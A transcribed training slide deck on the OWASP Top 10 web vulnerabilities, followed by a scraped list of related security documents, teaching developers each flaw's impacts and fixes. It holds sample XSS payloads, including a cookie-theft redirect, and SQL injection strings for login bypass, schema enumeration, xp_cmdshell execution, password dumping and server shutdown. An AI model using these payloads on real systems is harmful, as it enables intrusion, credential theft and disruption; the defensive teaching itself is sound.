Top Ten Most Critical Web Application Security Vulnerabilities
|
|
|
- Asher Blankenship
- 10 years ago
- Views:
Transcription
1 The OWASP Top 10
2 2
3 Top Ten Most Critical Web Application Security Vulnerabilities Cross-site scripting (XSS) Injection flaws Unvalidated input Buffer overflow Error handling Broken authentication and session management Broken access control Insecure storage Denial of service Insecure configuration management
4 Cross-Site Scripting (XSS) Occurs any time Raw data from attacker is sent to an innocent user Raw data Stored in database Reflected from web input (form field, hidden field, url, etc ) Sent directly into rich JavaScript client Virtually every web application has this problem Try this in your browser javascript:alert(document.cookie)
5 Stored Cross-Site Scripting Illustrated 1 Attacker sets the trap update my profile Attacker enters a malicious script into a web page that stores the data on the server Application with stored XSS vulnerability 2 Victim views page sees attacker profile Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions Custom Code Script runs inside victim s browser with full access to the DOM and cookies 3 Script silently sends attacker Victim s session cookie
6 Reflected Cross Site Scripting Illustrated Search-field input is often reflected back to user. <script>alert(document.cookie)</script> Site reflects the script back to user where it executes and displays the session cookie in a pop-up.
7
8 Cross Site Scripting Attacks <style url(javascript:alert('javascript is executed'));</style> <STYLE url( <LINK REL=STYLESHEET TYPE="text/javascript" SRC="javascript_path.js"> <P STYLE="left:expression(eval('alert(\'JavaScript is executed\');window.close()'))" > <LAYER SRC="js.html"></LAYER> -- also ILAYER, FRAME, IFRAME use to execute remote JavaScript <IMG SRC="&{javascript_expression};"> <IMG SRC="&{alert('alert')};"> 'about:<script>alert();</script>' -- alternate form of script piece <IMG src="javascript:%61%6c%65%72%74%28%29%3b"> -- resolves to 'javascript.alert()'
9 Cross Site Scripting Attacks <script>alert('bang!');</script> // basic xss <SCRIPT SRC=" <IMG SRC "foo.jpg" <BODY ONLOAD=alert( xss )>> // no script/javascript <IMG SRC="javascript:alert('test');"> <IMG SRC="livescript:js_expression"> <IMG SRC="java script:js_expression"> <IMG SRC="java script:js_expression"> <IMG SRC="java script:js_expression"> <style TYPE="text/javascript">JS EXPRESSION</style> <style TYPE="text/javascript">alert(document.domain);</style> <STYLE TYPE="application/x-javascript">alert('JavaScript has been Executed');</STYLE> <script>document.location=' '+document.cookie</script>
10 XSS Example
11
12 Business Impacts of XSS Attackers can Steal user sessions for complete account takeover Steal data on web pages viewed by victim Deface pages viewed by victim Monitor pages viewed by victim *NEW* Scan victim s intranet Business consequences Washington Post story (NSA and many others) Loss of customer confidence
13 Finding and Fixing XSS Verify your architecture You ll need a validation library Verify the implementation Be sure there s a plan for input validation and encoding Positive validation methods for all untrusted data fields Static and dynamic tools have spotty coverage here Be sure it covers all input HTML entity encoding method (e.g. < > ') Search for calls that take input from untrusted sources Be sure it uses a positive security model Verify the use of input validation and encoding Use WebScarab to test the implementation
14 Techniques for Verifying Service Use Penetration Testing Vulnerability Scanning Code Review Static Analysis
15
16 Setting Up a Proxy in IE
17 OWASP WebScarab A Web Application Testing Proxy You cannot write secure Enable web applications or web services without a way to perform security tests Example Intercept Window
18
19 Using Eclipse for Code Review Powerful Search Tools Syntax highlighting Code browsing Security Help Static Analysis
20 Injection Flaws Injection means Tricking an application into including unintended commands in the data sent to an interpreter Interpreters Take strings and interpret them as commands SQL, OS Shell, LDAP, XPath, etc SQL injection is still quite common Many applications still susceptible
21 Bobby Tables
22 SQL Injection Indirect attacks or SQL Injection One of the most common attacks on database applications is a SQL injection. During this attack malicious code is entered into web form fields to make a system execute a command shell or other code. It can be used to bypass authorization, retrieve unauthorized data and alter data on database systems. Here is an example of code used on a web application. username= johndoe and password= anonymous So what would happen if the inputted data were itself a single quote? If you get this error, then you can attempt SQL injection attacks. Microsoft OLE DB Provider for ODBC Drivers error 80040e14 ([Microsoft][ODBC Microsoft Access Driver] Extra ) In query expression UserID= AND Password = /_tblemployees/login3.asp, line 49
23 Why SQL Injection? This is an example of code that may be running on the SQL server: SELECT name, phone, address, bank_details FROM tbllogins WHERE name = AND password = ; The white boxes refer to the user input fields on the database front end although it is actually a variable containing some value. SELECT name, phone, address, bank_details FROM tbllogins WHERE name = & varname & AND password = & varpassword & ; The data you enter into the user input field is being used to build the complete SQL statement, but an attacker may not enter a username and password! By entering (injecting) a positive statement like OR 1=1;-- you can bypass the login authorization!
24 Why SQL Injection? Select name, phone, address, bank_details FROM tbllogins WHERE name = OR 1=1;-- AND password = ; What does it all mean? - Closes the user input variable. OR - Continues the SQL statement. 1=1 - A true statement. ; - Finishes the statement Comments the rest of the line so that is doesn t processed. get The server wants a balance between the value name and the user input. We give it 1=1 so that is sees a balance and logs us on as the first account in the table. SQL Injection has other possibilities as we will see shortly.
25 SQL Connection Properties Every connection to a database has properties assigned to it, this includes web front ends. The page itself has to authenticate. Username and Password are two of the properties. These properties determine the level of privileges that a user connects with and therefore what privileges your SQL statements are processed as.
26 SQL Injection: Enumeration Table and Field Name Enumeration. SELECT FName, LName, EmpID FROM Emp WHERE City = ; SELECT name FROM syscolumns WHERE xtype= U ;-- This will inject the code in red, which will retrieve the name of any user created columns throughout the whole table.
27 SQL Injection: Enumeration Other avenues are open to an attacker to enumerate information from a target database system. The use of verbose error messages can be very effective, especially if those error messages give away extra information. By using the HAVING SQL command, an attacker can generate an error from every recordset. SELECT name FROM logins WHERE name='' HAVING 1=1;-- AND password =''; The screenshot to the right is taken from Foundstone s HacmeBank application and shows the use of verbose error messages to enumerate information about tables and columns.
28 SQL Extended Stored Procedures Extended stored procedures allow the database server to perform powerful actions such as communicate with the OS. There are several extended stored procedures that can cause permanent damage to a system. We can execute an extended stored procedure using any input form with an injected command: webpage.asp?city=edinburgh ';EXEC master.dbo.xp_cmdshell 'iisreset' ; -- Username: ' ; EXEC master.dbo.xp_cmdshell 'iisreset' ; -- Password: This executes the xp_cmdshell stored procedure and passes a DOS type command to the operating system. MS SQL Server, by default, runs under an admin level service account!
29 SQL Extended Stored Procedures sp_makewebtask ; exec sp_makewebtask c:\inetpub\wwwroot\out.htm, Select name, password FROM master.dbo.sysxlogins
30 Shutting Down SQL Server One of SQL Server's most powerful commands is SHUTDOWN WITH NOWAIT, which causes it to shutdown, immediately stopping the Windows service. Username: ' ; shutdown with nowait; -- Password: This can happen if the SQL command runs the following query: SELECT username FROM users WHERE username='; shutdown with nowait;- -' and password=' ';
31 Business Impacts of SQL Injection Attackers can Access the entire database schema Steal, modify, and delete database contents Prevent legitimate access to the database Run operating system commands on database server Disclose company proprietary data Business consequences Wall Street Journal story FTC prosecution (Guess Jeans, PETCO)
32 Finding and Fixing SQL Injection Verify your architecture Use a component or strict pattern for database queries Use validation and parameterized queries Validation detects attacks Verify the implementation Static analysis tools with data flow analysis getting good at this Search for calls that invoke the database Stored procedures provide only limited protection Parameterized queries prevent the damage Verify that validation and parameterized queries are used Make sure the queries are actually parameterized
33 Unvalidated Input Architectural issue Solving any single validation problem is simple Creating an architecture that prevents problems is hard Create a library for validation and encoding Make it the only way for developers to access raw input Use positive or whitelist validation Leading indicator of attacks in progress Virtually all applications let attackers attack forever without detecting they are under attack
34 Business Impacts of Unvalidated Input Attackers can Business consequences Destroy your application s integrity Sarbanes-Oxley Embed attacks in your data More vulnerabilities Trick you into forwarding attacks to other systems Extra expense constantly fixing and re-fixing input problems Use errors to learn how to attack better
35 Finding and Fixing Unvalidated Input Verify your architecture Do you have requirements and architecture for validation? Do developers have a clear guideline on how to do it? Validation needs to be pretty close to use Don t create maintenance problems Verify the implementation No tool support finding architecture-level issues Verify validation is done on all input Don t allow blacklists
36 Buffer Overflows A buffer overflow occurs when User input overflows the end of a buffer and overwrites the stack Can be used to execute arbitrary code All time vulnerability leader We ve understood this problem for 30 years Only diminishing now because Java and.net aren t susceptible Web applications Web applications read all types of input from users and pass to apps, DLL s, native code, operating system, etc
37 Buffer Overflow Illustrated 0xFFFFFFFF argument 2 argument 1 Address of Attack code return address frame pointer locals Attack code buffer From Dawn Song s RISE: tute/slides/song.ppt kernel space stack shared library heap bss static data code 0xC x x x
38 Business Impacts of Buffer Overflows Attackers can Completely compromise a web server Business consequences Complete loss of control of application and all data Launch additional attacks from compromised machine Difficult forensics and incident recovery Install rootkit Negligence lawsuit?
39 Finding and Fixing Buffer Overflows Verify your architecture Avoid the use of C and C++ directly and indirectly Beware native calls, JNI,.NET unmanaged code, exec Use static analysis tools These bugs can be extremely difficult to find and eliminate Verify the implementation Static analysis tools getting good at this problem Use safe string libraries correctly Keep up with patches
40 Improper Error Handling Web applications encounter error conditions Frequently this invokes untested code paths Attackers learn your application through error messages Identify attacks and handle appropriately Never show a user a stack trace If someone is attacking you, don t keep trying to help But how do you know which errors are attacks? Most web applications are quite fragile Especially when you use a tool like WebScarab
41
42 Improper Error Handling Illustrated Many security mechanisms fail open isauthenticated() isauthorized() isvalid() Bad logic if (!security test()) then return false return true Good logic if (security test()) then return true return false
43 Business Impacts of Improper Error Handling Attackers can Bypass security mechanisms Deny service Learn information about your application Business consequences Lack of detection allows attackers to attack until success Prevents legal response to successful attack
44 Finding and Fixing Improper Error Handling Verify your architecture Do you have a hierarchy of security exception types Do you track exceptions by user? Establish a pattern for your project Create guideline with a pattern for handling security errors Must address errors in all security mechanisms Verify the implementation Dynamic and static tools find the trivial problems Search for stack trace printing and empty catch blocks Use WebScarab to test the implementation
45 Broken Authentication and Session Mgmt HTTP is stateless protocol Session management Beware the side-doors Means credentials have to go with every request Should use SSL for everything requiring authentication SESSIONID used to track state since HTTP doesn t SESSIONID is just as good as credentials to an attacker Never expose SESSIONID on network, in browser, in logs, Change my password, remember my password, forgot my password, secret question, logout, address, etc
46
47
48 Broken Authentication Illustrated 1 User sends credentials Site uses URL rewriting (i.e., put session in URL) 2 Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Custom Code Bus. Functions 3 User clicks on a link to in a forum 5 Hacker uses JSESSIONID and takes over victim s account Hacker checks referer logs on and finds user s JSESSIONID 4
49 Business Impacts of Broken Authentication Attackers can Hijack other user s accounts Business consequences Lack of accountability Do anything that user can do Wall Street Journal story Privacy compliance violations
50 Finding and Fixing Broken Authentication Verify your architecture Authentication should be simple and centralized Use the standard session id provided by your container Be sure SSL protects both credentials and session id Verify the implementation Forget automated approaches Check your SSL certificate Examine all the authentication-related functions Verify that logoff actually destroys the session Use WebScarab to test the implementation
51 Broken Access Control How do you control what users can see and do? Many people call this authorization Many levels of access control needed Can this person access the site at all? Can they access this URL? Can they invoke this function? With these parameters? Can they access this data? Should they see the link to this resource or function? Unique for each site and role Flaws totally invisible to scanners
52 Broken Access Control Illustrated Attacker notices the URL indicates his role /user/getaccounts He modifies it to another directory (role) /admin/getaccounts, or /manager/getaccounts Attacker views more accounts than just their own
53 Where Does Access Control Typically Occur? In the environment Web server, app server, or filter (e.g., SiteMinder) enforces URL control And in the controller Code decides whether to invoke a business function And in the business logic Code decides whether to invoke a function or show data And in the data layer Code decides what data to show And in the presentation layer Code decides whether to show links, menus, buttons, forms, data User Browser Presentation Layer Data Layer Business Logic Controller Environment
54
55 Business Impacts of Broken Access Control Attackers can Access other user s accounts Access data they re not authorized for Invoke functions they re not authorized for Search for temporary report files Search for files not intended to be accessed in production Affect other user s accounts Business consequences Wall Street Journal story FTC prosecution
56 Finding and Fixing Broken Access Control Verify your architecture Use a simple, positive model at every layer Be sure you actually have a mechanism at every layer Beware of presentation layer access control The fact that there s no button or link won t stop a hacker Verify the implementation Forget automated approaches Verify the control flow in the code to ensure checks Use WebScarab to forge unauthorized requests
57 Insecure Storage Storing sensitive data insecurely Identify all sensitive data Identify all the places that sensitive data is located Identify all the connections that sensitive data traverses Protect with appropriate mechanisms File encryption, database encryption, access control, SSL
58 Insecure Storage Illustrated 1 User enters credit card number in form Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions Custom Code 4 Malicious insider steals 40 million credit card numbers Logs are accessible to all members of IT staff for debugging purposes Log files Error handler logs CC details because merchant gateway is unavailable 3 2
59
60 Business Impacts of Insecure Storage Access confidential or private information Extract secrets to use in additional attacks Attackers can Business consequences Privacy lawsuit from EPIC Customer dissatisfaction and loss of trust PCI standard violation (e.g., lose ability to process CCs) org/ar/chrondatabreache s.htm
61 Finding and Fixing Insecure Storage Verify your architecture Identify all sensitive data Identify all the places that data is stored Ensure threat model accounts for possible attacks Verify the implementation Forget automated approaches Encryption is tricky use standard mechanisms Choose the right algorithm Store keys, certificates, and passwords carefully Analyze encryption code for common flaws
62 Application Denial of Service Reliance on applications The more we rely, the more we demand availability Denial of service attacks Attempt to block or interfere with the use of an application Called floods and lockouts How do you tell the difference Between legitimate users and a distributed DOS attack
63 Application DOS Illustrated 1 Attacker overloads some limited resource Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions Custom Code Database 3 Legitimate user s request is rejected Database connection pool exhausted 2
64 Business Impacts of Application DOS Attackers can Prevent legitimate users from accessing data Business consequences Wall Street Journal story Interfere with business functions Undermined confidence in services Expensive response, forensics, and remediation
65 Finding and Fixing Application DOS Verify your architecture Analyze limited resources for possible exhaustion Try to cache everything before authentication Be sure to authenticate before spending resources Then you can block offending users Verify the implementation Forget automated approaches Like performance testing, but malicious! Review the code for possible resource exhaustion
66 Insecure Configuration Management Web applications rely on a secure foundation All through the network and platform Don t forget the development environment Is your source code a secret? Think of all the places your source code goes Security does not require secret source code CM must extend to all parts of the application All credentials should change in production
67 Insecure Configuration Illustrated Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions Database Custom Code App Configuration Insider Framework App Server Web Server Hardened OS Development QA Servers Test Servers Source Control
68 Business Impacts of Insecure Configuration Attackers can Gain control of your entire application and data Business consequences Expensive forensics and remediation Install backdoor for future access Use platform as a launching point for other attacks
69 Finding and Fixing Insecure Configuration Verify your CM Secure configuration hardening guideline Must cover entire platform and application Analyze security effects of changes Can you dump the application configuration Build reporting into your process If you can t check it, it isn t secure Verify the implementation Scanning finds generic configuration problems
70 Where to Learn More
71 What best describes a buffer over flow. Memory management issues with memory heap space Injected SQL commands Malicious script on the server None of the above
72 What best describes a buffer over flow. Memory management issues
73 True or False. Stored Cross Site Scripting is reflected back to the browser
74 True or False. Stored Cross Site Scripting is reflected back to the browser False
75 All of the following are good to prevent SQL injection except. Prepared Statements Parameterized Queries Black list validation White List Validation
76 All of the following are good to prevent SQL injection except. Black list validation
77 Review Cross-site scripting (XSS) Injection flaws Unvalidated input Buffer overflow Error handling Broken authentication and session management Broken access control Insecure storage Denial of service Insecure configuration management
OWASP and OWASP Top 10 (2007 Update) OWASP. The OWASP Foundation. Dave Wichers. The OWASP Foundation. OWASP Conferences Chair dave.wichers@owasp.
and Top 10 (2007 Update) Dave Wichers The Foundation Conferences Chair [email protected] COO, Aspect Security [email protected] Copyright 2007 - The Foundation This work is available
FINAL DoIT 11.03.2015 - v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES
Purpose: The Department of Information Technology (DoIT) is committed to developing secure applications. DoIT s System Development Methodology (SDM) and Application Development requirements ensure that
Application Security Vulnerabilities, Mitigation, and Consequences
Application Security Vulnerabilities, Mitigation, and Consequences Sean Malone, CISSP, CCNA, CEH, CHFI [email protected] Institute of Internal Auditors April 10, 2012 Overview Getting Technical
3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management
What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) [email protected] Open Web Application Security Project http://www.owasp.org
What is Web Security? Motivation
[email protected] http://www.brucker.ch/ Information Security ETH Zürich Zürich, Switzerland Information Security Fundamentals March 23, 2004 The End Users View The Server Providers View What is Web
The Top Web Application Attacks: Are you vulnerable?
QM07 The Top Web Application Attacks: Are you vulnerable? John Burroughs, CISSP Sr Security Architect, Watchfire Solutions [email protected] Agenda Current State of Web Application Security Understanding
ArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young
ArcGIS Server Security Threats & Best Practices 2014 David Cordes Michael Young Agenda Introduction Threats Best practice - ArcGIS Server settings - Infrastructure settings - Processes Summary Introduction
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY www.alliancetechpartners.com WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY More than 70% of all websites have vulnerabilities
Magento Security and Vulnerabilities. Roman Stepanov
Magento Security and Vulnerabilities Roman Stepanov http://ice.eltrino.com/ Table of contents Introduction Open Web Application Security Project OWASP TOP 10 List Common issues in Magento A1 Injection
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current
External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION
External Vulnerability Assessment -Technical Summary- Prepared for: ABC ORGANIZATI On March 9, 2008 Prepared by: AOS Security Solutions 1 of 13 Table of Contents Executive Summary... 3 Discovered Security
How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering
How to break in Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering Time Agenda Agenda Item 9:30 10:00 Introduction 10:00 10:45 Web Application Penetration
Thick Client Application Security
Thick Client Application Security Arindam Mandal ([email protected]) (http://www.paladion.net) January 2005 This paper discusses the critical vulnerabilities and corresponding risks in a two
Where every interaction matters.
Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper
WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats
WHITE PAPER FortiWeb and the OWASP Top 10 PAGE 2 Introduction The Open Web Application Security project (OWASP) Top Ten provides a powerful awareness document for web application security. The OWASP Top
Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH [email protected] January 17, 2014 2014 Mega Conference
Cracking the Perimeter via Web Application Hacking Zach Grace, CISSP, CEH [email protected] January 17, 2014 2014 Mega Conference About 403 Labs 403 Labs is a full-service information security and compliance
Detecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008
Detecting Web Application Vulnerabilities Using Open Source Means OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008 Kostas Papapanagiotou Committee Member OWASP Greek Chapter [email protected]
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security Presented 2009-05-29 by David Strauss Thinking Securely Security is a process, not
Last update: February 23, 2004
Last update: February 23, 2004 Web Security Glossary The Web Security Glossary is an alphabetical index of terms and terminology relating to web application security. The purpose of the Glossary is to
Columbia University Web Security Standards and Practices. Objective and Scope
Columbia University Web Security Standards and Practices Objective and Scope Effective Date: January 2011 This Web Security Standards and Practices document establishes a baseline of security related requirements
Criteria for web application security check. Version 2015.1
Criteria for web application security check Version 2015.1 i Content Introduction... iii ISC- P- 001 ISC- P- 001.1 ISC- P- 001.2 ISC- P- 001.3 ISC- P- 001.4 ISC- P- 001.5 ISC- P- 001.6 ISC- P- 001.7 ISC-
Top Ten Web Application Vulnerabilities in J2EE. Vincent Partington and Eelco Klaver Xebia
Top Ten Web Application Vulnerabilities in J2EE Vincent Partington and Eelco Klaver Xebia Introduction Open Web Application Security Project is an open project aimed at identifying and preventing causes
Web Application Penetration Testing
Web Application Penetration Testing 2010 2010 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property. Will Bechtel [email protected]
Web application security
Web application security Sebastian Lopienski CERN Computer Security Team openlab and summer lectures 2010 (non-web question) Is this OK? int set_non_root_uid(int uid) { // making sure that uid is not 0
Essential IT Security Testing
Essential IT Security Testing Application Security Testing for System Testers By Andrew Muller Director of Ionize Who is this guy? IT Security consultant to the stars Member of OWASP Member of IT-012-04
Check list for web developers
Check list for web developers Requirement Yes No Remarks 1. Input Validation 1.1) Have you done input validation for all the user inputs using white listing and/or sanitization? 1.2) Does the input validation
OWASP Top Ten Tools and Tactics
OWASP Top Ten Tools and Tactics Russ McRee Copyright 2012 HolisticInfoSec.org SANSFIRE 2012 10 JULY Welcome Manager, Security Analytics for Microsoft Online Services Security & Compliance Writer (toolsmith),
Advanced Web Technology 10) XSS, CSRF and SQL Injection 2
Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 Table of Contents Cross Site Request Forgery - CSRF Presentation
Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh
Web applications Web security: web basics Myrto Arapinis School of Informatics University of Edinburgh HTTP March 19, 2015 Client Server Database (HTML, JavaScript) (PHP) (SQL) 1 / 24 2 / 24 URLs HTTP
Introduction to Web Application Security. Microsoft CSO Roundtable Houston, TX. September 13 th, 2006
Introduction to Web Application Security Microsoft CSO Roundtable Houston, TX September 13 th, 2006 Overview Background What is Application Security and Why Is It Important? Examples Where Do We Go From
Barracuda Web Site Firewall Ensures PCI DSS Compliance
Barracuda Web Site Firewall Ensures PCI DSS Compliance E-commerce sales are estimated to reach $259.1 billion in 2007, up from the $219.9 billion earned in 2006, according to The State of Retailing Online
Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011 Agenda Evolving Threats Operating System Application User Generated Content JPL s Application Security Program Securing
Java Web Application Security
Java Web Application Security RJUG Nov 11, 2003 Durkee Consulting www.rd1.net 1 Ralph Durkee SANS Certified Mentor/Instructor SANS GIAC Network Security and Software Development Consulting Durkee Consulting
Web Application Report
Web Application Report This report includes important security information about your Web Application. Security Report This report was created by IBM Rational AppScan 8.5.0.1 11/14/2012 8:52:13 AM 11/14/2012
Web Application Security
Chapter 1 Web Application Security In this chapter: OWASP Top 10..........................................................2 General Principles to Live By.............................................. 4
Nuclear Regulatory Commission Computer Security Office Computer Security Standard
Nuclear Regulatory Commission Computer Security Office Computer Security Standard Office Instruction: Office Instruction Title: CSO-STD-1108 Web Application Standard Revision Number: 1.0 Effective Date:
FINAL DoIT 04.01.2013- v.8 APPLICATION SECURITY PROCEDURE
Purpose: This procedure identifies what is required to ensure the development of a secure application. Procedure: The five basic areas covered by this document include: Standards for Privacy and Security
Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure
Vulnerabilities, Weakness and Countermeasures Massimo Cotelli CISSP Secure : Goal of This Talk Security awareness purpose Know the Web Application vulnerabilities Understand the impacts and consequences
Web Application Security
E-SPIN PROFESSIONAL BOOK Vulnerability Management Web Application Security ALL THE PRACTICAL KNOW HOW AND HOW TO RELATED TO THE SUBJECT MATTERS. COMBATING THE WEB VULNERABILITY THREAT Editor s Summary
Passing PCI Compliance How to Address the Application Security Mandates
Passing PCI Compliance How to Address the Application Security Mandates The Payment Card Industry Data Security Standards includes several requirements that mandate security at the application layer. These
Web Engineering Web Application Security Issues
Security Issues Dec 14 2009 Katharina Siorpaes Copyright 2009 STI - INNSBRUCK www.sti-innsbruck.at It is NOT Network Security It is securing: Custom Code that drives a web application Libraries Backend
Members of the UK cyber security forum. Soteria Health Check. A Cyber Security Health Check for SAP systems
Soteria Health Check A Cyber Security Health Check for SAP systems Soteria Cyber Security are staffed by SAP certified consultants. We are CISSP qualified, and members of the UK Cyber Security Forum. Security
Web Application Security
Web Application Security Prof. Sukumar Nandi Indian Institute of Technology Guwahati Agenda Web Application basics Web Network Security Web Host Security Web Application Security Best Practices Questions?
CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities
CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities Thomas Moyer Spring 2010 1 Web Applications What has changed with web applications? Traditional applications
Application Security Testing. Erez Metula (CISSP), Founder Application Security Expert [email protected]
Application Security Testing Erez Metula (CISSP), Founder Application Security Expert [email protected] Agenda The most common security vulnerabilities you should test for Understanding the problems
OWASP AND APPLICATION SECURITY
SECURING THE 3DEXPERIENCE PLATFORM OWASP AND APPLICATION SECURITY Milan Bruchter/Shutterstock.com WHITE PAPER EXECUTIVE SUMMARY As part of Dassault Systèmes efforts to counter threats of hacking, particularly
Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet
Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet March 8, 2012 Stephen Kost Chief Technology Officer Integrigy Corporation Phil Reimann Director of Business Development
1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications
1. Introduction 2. Web Application 3. Components 4. Common Vulnerabilities 5. Improving security in Web applications 2 What does World Wide Web security mean? Webmasters=> confidence that their site won
(WAPT) Web Application Penetration Testing
(WAPT) Web Application Penetration Testing Module 0: Introduction 1. Introduction to the course. 2. How to get most out of the course 3. Resources you will need for the course 4. What is WAPT? Module 1:
National Information Security Group The Top Web Application Hack Attacks. Danny Allan Director, Security Research
National Information Security Group The Top Web Application Hack Attacks Danny Allan Director, Security Research 1 Agenda Web Application Security Background What are the Top 10 Web Application Attacks?
Web Application Hacking (Penetration Testing) 5-day Hands-On Course
Web Application Hacking (Penetration Testing) 5-day Hands-On Course Web Application Hacking (Penetration Testing) 5-day Hands-On Course Course Description Our web sites are under attack on a daily basis
Sitefinity Security and Best Practices
Sitefinity Security and Best Practices Table of Contents Overview The Ten Most Critical Web Application Security Risks Injection Cross-Site-Scripting (XSS) Broken Authentication and Session Management
Application Security Testing. Generic Test Strategy
Application Security Testing Generic Test Strategy Page 2 of 8 Contents 1 Introduction 3 1.1 Purpose: 3 1.2 Application Security Testing: 3 2 Audience 3 3 Test Strategy guidelines 3 3.1 Authentication
Secure Web Development Teaching Modules 1. Threat Assessment
Secure Web Development Teaching Modules 1 Threat Assessment Contents 1 Concepts... 1 1.1 Software Assurance Maturity Model... 1 1.2 Security practices for construction... 3 1.3 Web application security
Web Application Vulnerability Testing with Nessus
The OWASP Foundation http://www.owasp.org Web Application Vulnerability Testing with Nessus Rïk A. Jones, CISSP [email protected] Rïk A. Jones Web developer since 1995 (16+ years) Involved with information
Rational AppScan & Ounce Products
IBM Software Group Rational AppScan & Ounce Products Presenters Tony Sisson and Frank Sassano 2007 IBM Corporation IBM Software Group The Alarming Truth CheckFree warns 5 million customers after hack http://infosecurity.us/?p=5168
Securing Your Web Application against security vulnerabilities. Ong Khai Wei, IT Specialist, Development Tools (Rational) IBM Software Group
Securing Your Web Application against security vulnerabilities Ong Khai Wei, IT Specialist, Development Tools (Rational) IBM Software Group Agenda Security Landscape Vulnerability Analysis Automated Vulnerability
WHITE PAPER FORTIWEB WEB APPLICATION FIREWALL. Ensuring Compliance for PCI DSS 6.5 and 6.6
WHITE PAPER FORTIWEB WEB APPLICATION FIREWALL Ensuring Compliance for PCI DSS 6.5 and 6.6 CONTENTS 04 04 06 08 11 12 13 Overview Payment Card Industry Data Security Standard PCI Compliance for Web Applications
Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability
Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability WWW Based upon HTTP and HTML Runs in TCP s application layer Runs on top of the Internet Used to exchange
Introduction:... 1 Security in SDLC:... 2 Penetration Testing Methodology: Case Study... 3
Table of Contents Introduction:... 1 Security in SDLC:... 2 Penetration Testing Methodology: Case Study... 3 Information Gathering... 3 Vulnerability Testing... 7 OWASP TOP 10 Vulnerabilities:... 8 Injection
Integrated Network Vulnerability Scanning & Penetration Testing SAINTcorporation.com
SAINT Integrated Network Vulnerability Scanning and Penetration Testing www.saintcorporation.com Introduction While network vulnerability scanning is an important tool in proactive network security, penetration
ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST
ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST Performed Between Testing start date and end date By SSL247 Limited SSL247 Limited 63, Lisson Street Marylebone London
Adobe Systems Incorporated
Adobe Connect 9.2 Page 1 of 8 Adobe Systems Incorporated Adobe Connect 9.2 Hosted Solution June 20 th 2014 Adobe Connect 9.2 Page 2 of 8 Table of Contents Engagement Overview... 3 About Connect 9.2...
Chapter 1 Web Application (In)security 1
Introduction xxiii Chapter 1 Web Application (In)security 1 The Evolution of Web Applications 2 Common Web Application Functions 4 Benefits of Web Applications 5 Web Application Security 6 "This Site Is
elearning for Secure Application Development
elearning for Secure Application Development Curriculum Application Security Awareness Series 1-2 Secure Software Development Series 2-8 Secure Architectures and Threat Modeling Series 9 Application Security
Testing Web Applications for SQL Injection Sam Shober [email protected]
Testing Web Applications for SQL Injection Sam Shober [email protected] Abstract: This paper discusses the SQL injection vulnerability, its impact on web applications, methods for pre-deployment and
Application security testing: Protecting your application and data
E-Book Application security testing: Protecting your application and data Application security testing is critical in ensuring your data and application is safe from security attack. This ebook offers
Columbia University Web Application Security Standards and Practices. Objective and Scope
Columbia University Web Application Security Standards and Practices Objective and Scope Effective Date: January 2011 This Web Application Security Standards and Practices document establishes a baseline
Application Code Development Standards
Application Code Development Standards Overview This document is intended to provide guidance to campus system owners and software developers regarding secure software engineering practices. These standards
Web App Security Audit Services
locuz.com Professional Services Web App Security Audit Services The unsecured world today Today, over 80% of attacks against a company s network come at the Application Layer not the Network or System
Using Free Tools To Test Web Application Security
